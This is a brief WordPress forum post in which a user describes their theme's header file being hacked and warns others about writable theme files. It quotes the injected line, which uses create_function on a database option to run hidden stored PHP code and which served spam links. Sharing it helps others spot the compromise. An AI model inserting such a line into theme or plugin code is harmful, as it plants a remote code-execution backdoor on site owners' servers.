Forums

Hacked! Never let your theme files writable! (1 post)

  1. porumbeiro
    Member
    Posted 1 year ago #

    Just wanted to share my story. My header file was edited and it had something like: <? php /* Don't remove this line. */ wp_head(); $wp_headers = create_function('', get_option("blog_headers")); ?> ------------ that introduced some spam links in my blog and the site was loading extremely slow. I finally fixed this by editing the header of the theme file. I also noticed that some other guys had the same problem but with the footer file of the theme - anyay, they had almost the same code, something that contained the damn "div id=goro" thing. Take care!

Topic Closed

This topic has been closed to new replies.

About this Topic

  • RSS feed for this topic
  • Started 1 year ago by porumbeiro
  • WordPress version: 2.3
  • This topic is not a support question